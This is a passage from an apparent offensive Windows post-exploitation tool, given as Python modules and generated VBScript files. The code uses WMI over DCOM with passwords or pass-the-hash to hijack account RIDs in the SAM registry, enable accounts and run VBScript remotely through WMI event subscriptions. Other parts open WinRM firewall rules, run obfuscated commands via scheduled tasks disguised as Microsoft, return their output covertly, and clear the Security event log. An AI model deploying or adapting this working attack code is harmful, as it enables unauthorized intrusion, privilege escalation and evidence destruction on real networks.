isenable==1: 28 | result[14] = 532 #开启用户 532为用户开启/533用户关闭 29 | else: 30 | result[14]=533 31 | 32 | return result 33 | 34 | def user_set(ip='', username='', password='',domain='',hashes='',aesKey='',rids=""): 35 | rid_sp = rids.split(",") 36 | if len(rid_sp)!=2: 37 | print("[-] --setuser ,1/0") 38 | exit() 39 | rid=rid_sp[0] 40 | isenable=int(rid_sp[1]) 41 | if isenable==1: 42 | txt="Enable User rid:{} Sucess".format(rid) 43 | else: 44 | txt="Disable User rid:{} Sucess".format(rid) 45 | rid_teample_create(rid,0,1) 46 | vbsid = str(uuid.uuid1()) 47 | teamp_vbs_path = os.path.join(os.getcwd(), "vbs", "reg_permission.vbs") 48 | output_vbs_path = os.path.join(os.getcwd(), "output", "reg_permission.vbs") 49 | tmp = open(teamp_vbs_path, "r", encoding="utf-8").read() 50 | newfile = open(output_vbs_path, "w", encoding="utf-8") 51 | newfile.write(tmp) 52 | newfile.close() 53 | vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey, output_vbs_path, vbsid) 54 | time.sleep(2.5) 55 | vbsrun.delete(ip, username, password, domain, hashes, aesKey, vbsid) 56 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 57 | iWbemLevel1Login.RemRelease() 58 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) 59 | StdRegProv, resp = iWbemServices.GetObject("StdRegProv") 60 | rest = StdRegProv.GetBinaryValue(2147483650, 'SAM\\SAM\\Domains\\Account\\Users\\00000{}'.format(rid_sp[0]), 'F') 61 | ReturnValue = rest.ReturnValue 62 | if int(ReturnValue) == 0: 63 | uvalue = rest.uValue 64 | result_value = hex_set(uvalue, rid,isenable=isenable) 65 | print(result_value) 66 | out = StdRegProv.SetBinaryValue(2147483650, 'SAM\\SAM\\Domains\\Account\\Users\\00000{}'.format(rid), 'F',result_value) 67 | if int(out.ReturnValue) == 0: 68 | print(txt) 69 | else: 70 | print(txt.replace("Sucess","Failure")) 71 | else: 72 | print("[-] Registry permission modification failed Error Code:{}".format(ReturnValue)) 73 | dcom.disconnect() 74 | dcom.disconnect() 75 | 76 | def run(ip='', username='', password='',domain='',hashes='',aesKey='',ridlist=""): 77 | rid_sp=ridlist.split(",") 78 | if len(rid_sp)!=2: 79 | print("[-] --ridhijack ,") 80 | exit() 81 | rid_teample_create(rid_sp[0],rid_sp[1]) 82 | vbsid = str(uuid.uuid1()) 83 | teamp_vbs_path = os.path.join(os.getcwd(), "vbs", "reg_permission.vbs") 84 | output_vbs_path = os.path.join(os.getcwd(), "output", "reg_permission.vbs") 85 | tmp = open(teamp_vbs_path, "r", encoding="utf-8").read() 86 | newfile = open(output_vbs_path, "w", encoding="utf-8") 87 | newfile.write(tmp) 88 | newfile.close() 89 | vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey, output_vbs_path, vbsid) 90 | time.sleep(2.5) 91 | vbsrun.delete(ip, username, password, domain, hashes, aesKey, vbsid) 92 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 93 | iWbemLevel1Login.RemRelease() 94 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) 95 | StdRegProv, resp = iWbemServices.GetObject("StdRegProv") 96 | rest = StdRegProv.GetBinaryValue(2147483650, 'SAM\\SAM\\Domains\\Account\\Users\\00000{}'.format(rid_sp[0]), 'F') 97 | ReturnValue=rest.ReturnValue 98 | if int(ReturnValue)==0: 99 | uvalue=rest.uValue 100 | result_value=hex_set(uvalue,rid_sp[1]) 101 | print(result_value) 102 | out=StdRegProv.SetBinaryValue(2147483650, 'SAM\\SAM\\Domains\\Account\\Users\\00000{}'.format(rid_sp[0]), 'F', result_value) 103 | if int(out.ReturnValue)==0: 104 | print("[+] RID Hijack Sucess") 105 | else: 106 | print("[-] RID Hijack Failure ErrorCode:{}".format(int(out.ReturnValue))) 107 | else: 108 | print("[-] Registry permission modification failed Error Code:{}".format(ReturnValue)) 109 | dcom.disconnect() 110 | dcom.disconnect() -------------------------------------------------------------------------------- /module/userquery.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | from module import printReply 4 | def userquery(ip='', username='', password='',domain='',hashes='',aesKey=''): 5 | print("[*] UserAccount") 6 | dcom,iWbemLevel1Login=wmiconnect.wmiconnect(ip,username,password,domain,hashes,aesKey) 7 | iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL) 8 | iWbemLevel1Login.RemRelease() 9 | win32UserAccount, _ = iWbemServices.GetObject("Win32_UserAccount") 10 | UserAccount = iWbemServices.ExecQuery("SELECT * from Win32_UserAccount") 11 | userlist=printReply.printReply(UserAccount) 12 | user_splist = userlist.split("\n") 13 | for user in range(0, len(user_splist)): 14 | try: 15 | print(user_splist[user]) 16 | 17 | except Exception as error: 18 | pass 19 | 20 | dcom.disconnect() 21 | 22 | def user_rid_query(ip='', username='', password='',domain='',hashes='',aesKey=''): 23 | print("[*] User RID Query") 24 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 25 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) 26 | iWbemLevel1Login.RemRelease() 27 | win32UserAccount, _ = iWbemServices.GetObject("Win32_UserAccount") 28 | iEnumWbemClassObject = iWbemServices.ExecQuery("SELECT * from Win32_UserAccount") 29 | while True: 30 | try: 31 | Userinfo = iEnumWbemClassObject.Next(0xffffffff, 1)[0] 32 | Domain = Userinfo.Domain 33 | Name = Userinfo.Name 34 | Disabled = Userinfo.Disabled 35 | rid = hex(int(Userinfo.SID.split("-")[-1])).lstrip("0x") 36 | print("Domain:{} Name:{} Disabled:{} Rid:{}".format(Domain,Name,Disabled,rid)) 37 | except Exception as err: 38 | if str(err).find("WBEM_S_FALSE") > 0: 39 | break 40 | dcom.disconnect() 41 | 42 | -------------------------------------------------------------------------------- /module/vbsrun.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | from module import checkError 4 | import os 5 | 6 | def delete(ip='', username='', password='',domain='',hashes='',aesKey='',vbsname=''): 7 | print("[*] Removing ActiveScriptEventConsumer %s" % vbsname) 8 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 9 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/subscription', NULL, NULL) 10 | iWbemLevel1Login.RemRelease() 11 | checkError.checkError('Removing ActiveScriptEventConsumer %s' % vbsname, 12 | iWbemServices.DeleteInstance('ActiveScriptEventConsumer.Name="%s"' % vbsname)) 13 | 14 | print("[*] Removing EventFilter EF_%s" % vbsname) 15 | checkError.checkError('Removing EventFilter EF_%s' % vbsname, 16 | iWbemServices.DeleteInstance('__EventFilter.Name="EF_%s"' % vbsname)) 17 | 18 | print("[*] Removing FilterToConsumerBinding %s" % vbsname) 19 | checkError.checkError('Removing IntervalTimerInstruction TI_%s' % vbsname, 20 | iWbemServices.DeleteInstance( 21 | '__IntervalTimerInstruction.TimerId="TI_%s"' % vbsname)) 22 | 23 | print("[+] DeleteInstance __FilterToConsumerBinding.Consumer=\"ActiveScriptEventConsumer.Name=\"%s\" and Filter=\"__EventFilter.Name=\"EF_%s\"",vbsname,vbsname) 24 | checkError.checkError('Removing FilterToConsumerBinding %s' % vbsname, 25 | iWbemServices.DeleteInstance( 26 | r'__FilterToConsumerBinding.Consumer="ActiveScriptEventConsumer.Name=\"%s\"",' 27 | r'Filter="__EventFilter.Name=\"EF_%s\""' % ( 28 | vbsname, vbsname))) 29 | 30 | dcom.disconnect() 31 | 32 | def run_vbs(ip='', username='', password='',domain='',hashes='',aesKey='',vbsname='',vbsid=''): 33 | if os.path.exists(vbsname)==False: 34 | print("[-] not found vbs:{}".format(vbsname)) 35 | exit() 36 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 37 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/subscription', NULL, NULL) 38 | iWbemLevel1Login.RemRelease() 39 | ''' 40 | if __options.action.upper() == 'REMOVE': 41 | checkError('Removing ActiveScriptEventConsumer %s' % vbsname, 42 | iWbemServices.DeleteInstance('ActiveScriptEventConsumer.Name="%s"' % vbsname)) 43 | 44 | checkError('Removing EventFilter EF_%s' % vbsname, 45 | iWbemServices.DeleteInstance('__EventFilter.Name="EF_%s"' % vbsname)) 46 | 47 | checkError('Removing IntervalTimerInstruction TI_%s' % vbsname, 48 | iWbemServices.DeleteInstance( 49 | '__IntervalTimerInstruction.TimerId="TI_%s"' % vbsname)) 50 | 51 | checkError('Removing FilterToConsumerBinding %s' % vbsname, 52 | iWbemServices.DeleteInstance( 53 | r'__FilterToConsumerBinding.Consumer="ActiveScriptEventConsumer.Name=\"%s\"",' 54 | r'Filter="__EventFilter.Name=\"EF_%s\""' % ( 55 | vbsname, vbsname))) 56 | else: 57 | ''' 58 | print("[*] reading vbs:{}".format(vbsname)) 59 | vbsdata=open(vbsname,"r",encoding="utf-8").read() 60 | print("[*] Adding ActiveScriptEventConsume") 61 | if vbsid=='': 62 | vbsname="Example" 63 | else: 64 | vbsname=vbsid 65 | activeScript, _ = iWbemServices.GetObject('ActiveScriptEventConsumer') 66 | activeScript = activeScript.SpawnInstance() 67 | activeScript.Name = vbsname 68 | activeScript.ScriptingEngine = 'VBScript' 69 | activeScript.CreatorSID = [1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0] 70 | activeScript.ScriptText = vbsdata 71 | checkError.checkError('Adding ActiveScriptEventConsumer %s' % vbsname, 72 | iWbemServices.PutInstance(activeScript.marshalMe())) 73 | 74 | 75 | print("[*] Adding IntervalTimerInstruction") 76 | wmiTimer, _ = iWbemServices.GetObject('__IntervalTimerInstruction') 77 | wmiTimer = wmiTimer.SpawnInstance() 78 | wmiTimer.TimerId = 'TI_%s' % vbsname 79 | wmiTimer.IntervalBetweenEvents = int(2000) 80 | # wmiTimer.SkipIfPassed = False 81 | checkError.checkError('Adding IntervalTimerInstruction', 82 | iWbemServices.PutInstance(wmiTimer.marshalMe())) 83 | 84 | print("[*] Adding EventFilter EF_%s"% vbsname) 85 | eventFilter, _ = iWbemServices.GetObject('__EventFilter') 86 | eventFilter = eventFilter.SpawnInstance() 87 | eventFilter.Name = 'EF_%s' % vbsname 88 | eventFilter.CreatorSID = [1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0] 89 | eventFilter.Query = 'select * from __TimerEvent where TimerID = "TI_%s" ' % vbsname 90 | eventFilter.QueryLanguage = 'WQL' 91 | eventFilter.EventNamespace = r'root\subscription' 92 | checkError.checkError('Adding EventFilter EF_%s' % vbsname, 93 | iWbemServices.PutInstance(eventFilter.marshalMe())) 94 | 95 | print("[+] Adding FilterToConsumerBinding") 96 | filterBinding, _ = iWbemServices.GetObject('__FilterToConsumerBinding') 97 | filterBinding = filterBinding.SpawnInstance() 98 | filterBinding.Filter = '__EventFilter.Name="EF_%s"' % vbsname 99 | filterBinding.Consumer = 'ActiveScriptEventConsumer.Name="%s"' % vbsname 100 | filterBinding.CreatorSID = [1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0] 101 | 102 | checkError.checkError('Adding FilterToConsumerBinding', 103 | iWbemServices.PutInstance(filterBinding.marshalMe())) 104 | 105 | dcom.disconnect() -------------------------------------------------------------------------------- /module/winrm_enable.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | 4 | def winrm_enable(ip='', username='', password='',domain='',hashes='',aesKey='',isenable=0): 5 | if int(isenable)!=1 and int(isenable)!=0: 6 | print("[-] Pluse Query Help,Thanks....") 7 | exit() 8 | print("[*] Enable/Disable winrm") 9 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 10 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) 11 | WQL = 'select * from Win32_Service where Name="WinRM"' 12 | iEnumWbemClassObject = iWbemServices.ExecQuery(WQL) 13 | iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff, 1)[0] 14 | if int(isenable)==1: 15 | if iWbemClassObject.StartService().ReturnValue==0 or iWbemClassObject.StartService().ReturnValue==10: 16 | print("[+] winrm Service Start") 17 | elif int(isenable)==0: 18 | stopcode=iWbemClassObject.StopService().ReturnValue 19 | print("[*] WinRm Stop Service Return Code:{}".format(stopcode)) 20 | if stopcode==0 or stopcode==5: 21 | print("[+] winrm Service Stop") 22 | 23 | 24 | if int(isenable) == 1: 25 | print("[*] Enable Winrm Service") 26 | InstanceIDlist=["WINRM-HTTP-In-TCP","WINRM-HTTP-In-TCP-PUBLIC"] 27 | try: 28 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/StandardCimv2', NULL, NULL) 29 | except Exception as error: 30 | if "WBEM_E_INVALID_NAMESPACE" in str(error): 31 | iWbemServices=None 32 | 33 | if iWbemServices!=None: 34 | for InstanceIDName in InstanceIDlist: 35 | try: 36 | WQL2 = "SELECT * FROM MSFT_NetProtocolPortFilter where InstanceID = \"{}\"".format(InstanceIDName) 37 | firewall_list = iWbemServices.ExecQuery(WQL2) 38 | while True: 39 | pEnum = firewall_list.Next(0xffffffff, 1)[0] 40 | InstanceID = pEnum.InstanceID 41 | print("[*] Enable Firewall Rule InstanceID:{}".format(InstanceID)) 42 | MSFT_NetProtocolPortFilter = iWbemServices.ExecQuery( 43 | "select * from MSFT_NetFirewallRule where InstanceID=\"{}\"".format(InstanceID)).Next(0xffffffff, 1)[0] 44 | result = dict(MSFT_NetProtocolPortFilter.getProperties()) 45 | Enabled = MSFT_NetProtocolPortFilter.Enabled 46 | if Enabled == 2: 47 | firewall_Instance = MSFT_NetProtocolPortFilter.SpawnInstance() 48 | firewall_Instance.Enabled = 1 49 | firewall_Instance.CreationClassName = "fuckyouaasasasaasas" 50 | firewall_Instance.PolicyRuleName = "" 51 | firewall_Instance.SystemCreationClassName = "" 52 | firewall_Instance.SystemName = "" 53 | # allow=2, allowBypass=3, Block=4 54 | firewall_Instance.Action = 2 55 | firewall_Instance.Caption = "" 56 | firewall_Instance.CommonName = "" 57 | firewall_Instance.ConditionListType = 3 58 | firewall_Instance.Description = "" 59 | firewall_Instance.Direction = 1 60 | firewall_Instance.DisplayGroup = "" 61 | firewall_Instance.DisplayName = "AAAAAAAAAAAAAAA" 62 | firewall_Instance.EdgeTraversalPolicy = 0 63 | firewall_Instance.ElementName = " " 64 | firewall_Instance.EnforcementStatus = [0] 65 | firewall_Instance.ExecutionStrategy = 2 66 | firewall_Instance.LocalOnlyMapping = False 67 | firewall_Instance.LooseSourceMapping = False 68 | firewall_Instance.Mandatory = "" 69 | firewall_Instance.Owner = "" 70 | firewall_Instance.PolicyDecisionStrategy = 2 71 | firewall_Instance.PolicyKeywords = "" 72 | firewall_Instance.PolicyRoles = "" 73 | firewall_Instance.PolicyStoreSource = "PersistentStore" 74 | firewall_Instance.PolicyStoreSourceType = 1 75 | firewall_Instance.PrimaryStatus = 1 76 | firewall_Instance.Profiles = 0 77 | firewall_Instance.RuleGroup = "" 78 | firewall_Instance.RuleUsage = "" 79 | firewall_Instance.SequencedActions = 3 80 | firewall_Instance.Status = "The rule was parsed successfully from the store." 81 | firewall_Instance.StatusCode = 65536 82 | iWbemServices.PutInstance(firewall_Instance.marshalMe()) 83 | except Exception as error: 84 | if "WBEM_S_FALSE" in str(error): 85 | break 86 | else: 87 | print(error) 88 | exit(1) 89 | print("[+] Enable WinRm Firewall allow Rule ok") 90 | else: 91 | print("[*] The OS possible:Windows7/Windows Server 2008,Not Found //./root/StandardCimv2 NameSpace\nUnable to configure firewall rules") 92 | dcom.disconnect() -------------------------------------------------------------------------------- /module/wmiconnect.py: -------------------------------------------------------------------------------- 1 | from impacket.dcerpc.v5.dcom import wmi 2 | from impacket.dcerpc.v5.dcom.wmi import IWbemServices 3 | from impacket.dcerpc.v5.dcomrt import DCOMConnection 4 | from impacket.dcerpc.v5.dtypes import NULL 5 | from impacket.structure import Structure 6 | from impacket.smbconnection import SMBConnection, SMB_DIALECT, SMB2_DIALECT_002, SMB2_DIALECT_21 7 | from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY 8 | import logging 9 | import sys 10 | 11 | def wmiconnect(ip='', username='', password='',domain='',hashes='',aesKey=''): 12 | if hashes!=None and len(hashes) > 0: 13 | lmhash, nthash = hashes.split(':') 14 | else: 15 | lmhash, nthash = ("", "") 16 | 17 | result="" 18 | # smbConnection = SMBConnection(ip, ip) 19 | try: 20 | dcom = DCOMConnection(ip, username, password, domain, lmhash, nthash, aesKey, oxidResolver=True,doKerberos=False, kdcHost=None) 21 | iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login) 22 | iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface) 23 | return (dcom,iWbemLevel1Login) 24 | 25 | except (Exception, KeyboardInterrupt) as e: 26 | if logging.getLogger().level == logging.DEBUG: 27 | import traceback 28 | traceback.print_exc() 29 | logging.error(str(e)) 30 | # if smbConnection is not None: 31 | # smbConnection.logoff() 32 | dcom.disconnect() 33 | sys.stdout.flush() 34 | sys.exit(1) 35 | 36 | dcom.disconnect() 37 | sys.exit(1) -------------------------------------------------------------------------------- /output/clearEventLog.vbs: -------------------------------------------------------------------------------- 1 | Set LogFileSet = GetObject("winmgmts:{(Backup,Security)}").ExecQuery("select * from Win32_NTEventLogFile where LogfileName='Security'") 2 | 3 | for each Logfile in LogFileSet 4 | RetVal = LogFile.ClearEventlog() 5 | if RetVal = 0 then WScript.Echo "Log Cleared" 6 | next -------------------------------------------------------------------------------- /output/dele_file.vbs: -------------------------------------------------------------------------------- 1 | Set file=CreateObject("Scripting.FileSystemObject") 2 | file.DeleteFile("C:\Windows\Temp\2cbd1faa-ed4d-11ed-ae66-68545aac985a.txt") 3 | file.DeleteFile("C:\Windows\Temp\2cbd1faa-ed4d-11ed-ae66-68545aac985aer_.txt") 4 | -------------------------------------------------------------------------------- /output/delete_file.vbs: -------------------------------------------------------------------------------- 1 | Function Base64Decode(ByVal vCode) 2 | Set oNode = CreateObject("Msxml2.DOMDocument").CreateElement("base64") 3 | oNode.dataType = "bin.base64" 4 | oNode.text = vCode 5 | Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue) 6 | Set oNode = Nothing 7 | End Function 8 | 9 | Function Stream_BinaryToString(Binary) 10 | Set BinaryStream = CreateObject("ADODB.Stream") 11 | BinaryStream.Type = 1 12 | BinaryStream.Open 13 | BinaryStream.Write Binary 14 | BinaryStream.Position = 0 15 | BinaryStream.Type = 2 16 | ' All Format => utf-16le - utf-8 - utf-16le 17 | BinaryStream.CharSet = "utf-8" 18 | Stream_BinaryToString = BinaryStream.ReadText 19 | Set BinaryStream = Nothing 20 | End Function 21 | 22 | 23 | Set file=CreateObject("Scripting.FileSystemObject") 24 | file.DeleteFile(Base64Decode("QzpcV2luZG93c1xUZW1wXDdkZGEzOWE2LWRjZDctMTFlZC05MGYyLTY4NTQ1YWFjOTg1YWVyXy50eHQ=")) -------------------------------------------------------------------------------- /output/exec2_command.vbs: -------------------------------------------------------------------------------- 1 | FilePath = "C:\Windows\Temp\a27bfd46-ed4e-11ed-940b-68545aac985a.txt" 2 | FilePath2 = "C:\Windows\Temp\a27bfd46-ed4e-11ed-940b-68545aac985aer_.txt" 3 | 4 | Set fso=CreateObject("Scripting.FileSystemObject") 5 | If fso.fileExists(FilePath) Then 6 | Set objFileToRead = CreateObject("Scripting.FileSystemObject") 7 | file2size = objFileToRead.GetFile(FilePath2).size 8 | 9 | If file2size <> 0 Then 10 | Set fileread = objFileToRead.OpenTextFile(FilePath2,1) 11 | strFileText = fileread.ReadAll() 12 | b64text = str_to_base64(strFileText) 13 | Else 14 | Set fileread = objFileToRead.OpenTextFile(FilePath,1) 15 | strFileText = fileread.ReadAll() 16 | b64text = str_to_base64(strFileText) 17 | End If 18 | Set objLocator = CreateObject("wbemscripting.swbemlocator") 19 | Set SubobjSWbemServices = objLocator.ConnectServer(host, "root/subscription") 20 | Set temp = SubobjSWbemServices.Get("ActiveScriptEventConsumer") 21 | Set asec = temp.spawninstance_ 22 | asec.name="a27bfd46-ed4e-11ed-940b-68545aac985a" 23 | Asec.scriptingengine="vbscript" 24 | Asec.scripttext = b64text 25 | asecpath=asec.put_ 26 | End If 27 | 28 | Function Base64Decode(ByVal vCode) 29 | Set oNode = CreateObject("Msxml2.DOMDocument").CreateElement("base64") 30 | oNode.dataType = "bin.base64" 31 | oNode.text = vCode 32 | Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue) 33 | Set oNode = Nothing 34 | End Function 35 | 36 | Function Stream_BinaryToString(Binary) 37 | Set BinaryStream = CreateObject("ADODB.Stream") 38 | BinaryStream.Type = 1 39 | BinaryStream.Open 40 | BinaryStream.Write Binary 41 | BinaryStream.Position = 0 42 | BinaryStream.Type = 2 43 | ' All Format => utf-16le - utf-8 - utf-16le 44 | BinaryStream.CharSet = "utf-8" 45 | Stream_BinaryToString = BinaryStream.ReadText 46 | Set BinaryStream = Nothing 47 | End Function 48 | 49 | Const TriggerTypeDaily = 1 50 | Const ActionTypeExec = 0 51 | Set service = CreateObject("Schedule.Service") 52 | Call service.Connect 53 | Dim rootFolder 54 | Set rootFolder = service.GetFolder("\") 55 | Dim taskDefinition 56 | Set taskDefinition = service.NewTask(0) 57 | Dim regInfo 58 | Set regInfo = taskDefinition.RegistrationInfo 59 | regInfo.Description = "Update2" 60 | regInfo.Author = "Microsoft" 61 | Dim settings 62 | Set settings = taskDefinition.settings 63 | settings.Enabled = True 64 | settings.StartWhenAvailable = True 65 | settings.Hidden = False 66 | settings.DisallowStartIfOnBatteries = False 67 | Dim triggers 68 | Set triggers = taskDefinition.triggers 69 | Dim trigger 70 | Set trigger = triggers.Create(7) 71 | Dim Action 72 | Set Action = taskDefinition.Actions.Create(ActionTypeExec) 73 | Action.Path = "c:\windows\system32\cmd.exe" 74 | Action.arguments = chr(34) & "/c cd /d " & Base64Decode("QzpcV2luZG93c1xTeXN0ZW0zMg==") & "&" & Base64Decode("aXBjb25maWcgL2FsbA==") & " >> C:\Windows\Temp\a27bfd46-ed4e-11ed-940b-68545aac985a.txt 2>C:\Windows\Temp\a27bfd46-ed4e-11ed-940b-68545aac985aer_.txt&echo [S] >> C:\Windows\Temp\a27bfd46-ed4e-11ed-940b-68545aac985a.txt&cd >> C:\Windows\Temp\a27bfd46-ed4e-11ed-940b-68545aac985a.txt&echo [E] >> C:\Windows\Temp\a27bfd46-ed4e-11ed-940b-68545aac985a.txt" & chr(34) 75 | Dim objNet, LoginUser 76 | Set objNet = CreateObject("WScript.Network") 77 | LoginUser = objNet.UserName 78 | If UCase(LoginUser) = "SYSTEM" Then 79 | Else 80 | LoginUser = Empty 81 | End If 82 | Call rootFolder.RegisterTaskDefinition("a27bfd46-ed4e-11ed-940b-68545aac985a", taskDefinition, 6, LoginUser, , 3) 83 | Call rootFolder.DeleteTask("a27bfd46-ed4e-11ed-940b-68545aac985a",0) 84 | 85 | Function btoa(sourceStr) 86 | Dim i, j, n, carr, rarr(), a, b, c 87 | carr = Array("A", "B", "C", "D", "E", "F", "G", "H", _ 88 | "I", "J", "K", "L", "M", "N", "O" ,"P", _ 89 | "Q", "R", "S", "T", "U", "V", "W", "X", _ 90 | "Y", "Z", "a", "b", "c", "d", "e", "f", _ 91 | "g", "h", "i", "j", "k", "l", "m", "n", _ 92 | "o", "p", "q", "r", "s", "t", "u", "v", _ 93 | "w", "x", "y", "z", "0", "1", "2", "3", _ 94 | "4", "5", "6", "7", "8", "9", "+", "/") 95 | n = Len(sourceStr)-1 96 | ReDim rarr(n\3) 97 | For i=0 To n Step 3 98 | a = AscW(Mid(sourceStr,i+1,1)) 99 | If i < n Then 100 | b = AscW(Mid(sourceStr,i+2,1)) 101 | Else 102 | b = 0 103 | End If 104 | If i < n-1 Then 105 | c = AscW(Mid(sourceStr,i+3,1)) 106 | Else 107 | c = 0 108 | End If 109 | rarr(i\3) = carr(a\4) & carr((a And 3) * 16 + b\16) & carr((b And 15) * 4 + c\64) & carr(c And 63) 110 | Next 111 | i = UBound(rarr) 112 | If n Mod 3 = 0 Then 113 | rarr(i) = Left(rarr(i),2) & "==" 114 | ElseIf n Mod 3 = 1 Then 115 | rarr(i) = Left(rarr(i),3) & "=" 116 | End If 117 | btoa = Join(rarr,"") 118 | End Function 119 | 120 | 121 | Function char_to_utf8(sChar) 122 | Dim c, b1, b2, b3 123 | c = AscW(sChar) 124 | If c < 0 Then 125 | c = c + &H10000 126 | End If 127 | If c < &H80 Then 128 | char_to_utf8 = sChar 129 | ElseIf c < &H800 Then 130 | b1 = c Mod 64 131 | b2 = (c - b1) / 64 132 | char_to_utf8 = ChrW(&HC0 + b2) & ChrW(&H80 + b1) 133 | ElseIf c < &H10000 Then 134 | b1 = c Mod 64 135 | b2 = ((c - b1) / 64) Mod 64 136 | b3 = (c - b1 - (64 * b2)) / 4096 137 | char_to_utf8 = ChrW(&HE0 + b3) & ChrW(&H80 + b2) & ChrW(&H80 + b1) 138 | Else 139 | End If 140 | End Function 141 | 142 | Function str_to_utf8(sSource) 143 | Dim i, n, rarr() 144 | n = Len(sSource) 145 | ReDim rarr(n - 1) 146 | For i=0 To n-1 147 | rarr(i) = char_to_utf8(Mid(sSource,i+1,1)) 148 | Next 149 | str_to_utf8 = Join(rarr,"") 150 | End Function 151 | 152 | Function str_to_base64(sSource) 153 | str_to_base64 = btoa(str_to_utf8(sSource)) 154 | End Function 155 | 156 | 157 | 158 | -------------------------------------------------------------------------------- /output/exec_command_read.vbs: -------------------------------------------------------------------------------- 1 | Function btoa(sourceStr) 2 | Dim i, j, n, carr, rarr(), a, b, c 3 | carr = Array("A", "B", "C", "D", "E", "F", "G", "H", _ 4 | "I", "J", "K", "L", "M", "N", "O" ,"P", _ 5 | "Q", "R", "S", "T", "U", "V", "W", "X", _ 6 | "Y", "Z", "a", "b", "c", "d", "e", "f", _ 7 | "g", "h", "i", "j", "k", "l", "m", "n", _ 8 | "o", "p", "q", "r", "s", "t", "u", "v", _ 9 | "w", "x", "y", "z", "0", "1", "2", "3", _ 10 | "4", "5", "6", "7", "8", "9", "+", "/") 11 | n = Len(sourceStr)-1 12 | ReDim rarr(n\3) 13 | For i=0 To n Step 3 14 | a = AscW(Mid(sourceStr,i+1,1)) 15 | If i < n Then 16 | b = AscW(Mid(sourceStr,i+2,1)) 17 | Else 18 | b = 0 19 | End If 20 | If i < n-1 Then 21 | c = AscW(Mid(sourceStr,i+3,1)) 22 | Else 23 | c = 0 24 | End If 25 | rarr(i\3) = carr(a\4) & carr((a And 3) * 16 + b\16) & carr((b And 15) * 4 + c\64) & carr(c And 63) 26 | Next 27 | i = UBound(rarr) 28 | If n Mod 3 = 0 Then 29 | rarr(i) = Left(rarr(i),2) & "==" 30 | ElseIf n Mod 3 = 1 Then 31 | rarr(i) = Left(rarr(i),3) & "=" 32 | End If 33 | btoa = Join(rarr,"") 34 | End Function 35 | 36 | 37 | Function char_to_utf8(sChar) 38 | Dim c, b1, b2, b3 39 | c = AscW(sChar) 40 | If c < 0 Then 41 | c = c + &H10000 42 | End If 43 | If c < &H80 Then 44 | char_to_utf8 = sChar 45 | ElseIf c < &H800 Then 46 | b1 = c Mod 64 47 | b2 = (c - b1) / 64 48 | char_to_utf8 = ChrW(&HC0 + b2) & ChrW(&H80 + b1) 49 | ElseIf c < &H10000 Then 50 | b1 = c Mod 64 51 | b2 = ((c - b1) / 64) Mod 64 52 | b3 = (c - b1 - (64 * b2)) / 4096 53 | char_to_utf8 = ChrW(&HE0 + b3) & ChrW(&H80 + b2) & ChrW(&H80 + b1) 54 | Else 55 | End If 56 | End Function 57 | 58 | Function str_to_utf8(sSource) 59 | Dim i, n, rarr() 60 | n = Len(sSource) 61 | ReDim rarr(n - 1) 62 | For i=0 To n-1 63 | rarr(i) = char_to_utf8(Mid(sSource,i+1,1)) 64 | Next 65 | str_to_utf8 = Join(rarr,"") 66 | End Function 67 | 68 | Function str_to_base64(sSource) 69 | str_to_base64 = btoa(str_to_utf8(sSource)) 70 | End Function 71 | 72 | Set objFileToRead = CreateObject("Scripting.FileSystemObject").OpenTextFile("C:\Windows\Temp\4da2d1d4-e59a-11ed-accc-68545aac985a.txt",1) 73 | strFileText = objFileToRead.ReadAll() 74 | b64text = str_to_base64(strFileText) 75 | Set objLocator = CreateObject("wbemscripting.swbemlocator") 76 | Set SubobjSWbemServices = objLocator.ConnectServer(host, "root/subscription") 77 | Set temp = SubobjSWbemServices.Get("ActiveScriptEventConsumer") 78 | Set asec = temp.spawninstance_ 79 | asec.name="4da2d1d4-e59a-11ed-accc-68545aac985a" 80 | Asec.scriptingengine="vbscript" 81 | Asec.scripttext = b64text 82 | asecpath=asec.put_ 83 | -------------------------------------------------------------------------------- /output/listdir.vbs: -------------------------------------------------------------------------------- 1 | Function Base64Decode(ByVal vCode) 2 | Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") 3 | oNode.dataType = "bin.base64" 4 | oNode.text = vCode 5 | Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue) 6 | Set oNode = Nothing 7 | End Function 8 | 9 | Function Stream_BinaryToString(Binary) 10 | Set BinaryStream = CreateObject("ADODB.Stream") 11 | BinaryStream.Type = 1 12 | BinaryStream.Open 13 | BinaryStream.Write Binary 14 | BinaryStream.Position = 0 15 | 